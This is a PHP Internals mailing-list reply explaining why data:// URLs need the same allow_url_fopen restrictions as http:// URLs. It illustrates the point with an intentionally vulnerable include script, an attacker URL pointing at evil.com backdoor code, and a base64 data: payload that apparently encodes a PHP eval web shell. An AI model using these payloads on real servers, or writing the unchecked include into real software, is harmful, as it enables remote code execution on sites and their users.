On 11/03/13 12:36, Christian Stoller wrote: > Hi Stas. >> I'm afraid it is not a good idea. allow_url_fopen is meant to protect >> file functions (fopen and friends) from being injected with >> user-controlled data - i.e. if you control the filesystem and you do >> fopen() under allow_url_fopen then it is reasonable to assume the data >> under that filename is under your control. However, data:// URLs clearly >> violate this assumption no less than http:// URLs do - data: just does >> it without even requiring a web server. > I am unsure whether I understand you. As far as I know with the data:// > stream PHP does not access any file on the filesystem. It's just for > transforming normal content in a variable to a resource, or not? So I do not > see any risk. Maybe you can give me an example. Suppose you had the silly script:
<?php $file = $_GET['file']; include $file . ".php"; As there's no check at all to $file, an attacker could pass in the url &file=http://evil.com/backdoor-code and php would happily run the php code located at http://evil.com/backdoor-code.php If include of data urls is enabled, the attacker could do the same with &file=data:image/png;base64,PD9waHAgZXZhbCgkX0dFVFsiY29kZSJdKTsgPz4K -- PHP Internals - PHP Runtime Development Mailing List To unsubscribe, visit: http://www.php.net/unsub.php
